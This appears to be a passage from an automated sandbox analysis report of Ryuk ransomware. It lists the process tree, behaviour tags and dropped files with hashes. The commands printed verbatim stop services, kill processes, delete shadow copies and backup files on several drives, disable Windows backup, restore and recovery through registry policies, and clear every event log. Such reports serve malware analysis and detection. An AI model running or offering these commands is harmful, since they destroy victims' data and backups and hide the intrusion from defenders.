C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\hrmlog23⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AMSI/Debug"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AirSpaceChannel"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "FirstUXPerf-Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "General Logging"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "IHM_DebugChannel"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceMFT"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationFrameServer"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProc"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProcD3D"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationAsyncWrapper"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationContentProtection"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDS"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMP4"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMediaEngine"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformanceCore"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationSrcPrefetch"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txtFilesize
1KB
MD5f69127370e1f1aede86e881dd446f6aa
SHA165298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA5125e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exeFilesize
885KB
MD56a5bf25ff4f72ebca91280ffda057260
SHA1722063331acdbfc93ccbfacbec045800a835dd9e
SHA2560d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA51264d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
-
C:\ProgramData\RYUKIDFilesize
8B
MD585462c5c76a1f9effd9d24af445182da
SHA18b5f57029bd8ac3c5b182608de6691d6e1492b3f
SHA2568ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
SHA512828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5
-
C:\ProgramData\RyukReadMe.htmlFilesize
152B
MD5a641bf8ac8307aad57ecab53872e67db
SHA16fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA2569383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA5127d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4
-
C:\ProgramData\RyukReadMe.txtFilesize
1KB
MD5f69127370e1f1aede86e881dd446f6aa
SHA165298f80e3b97f59ea45179463ab9c5cc3ee9337
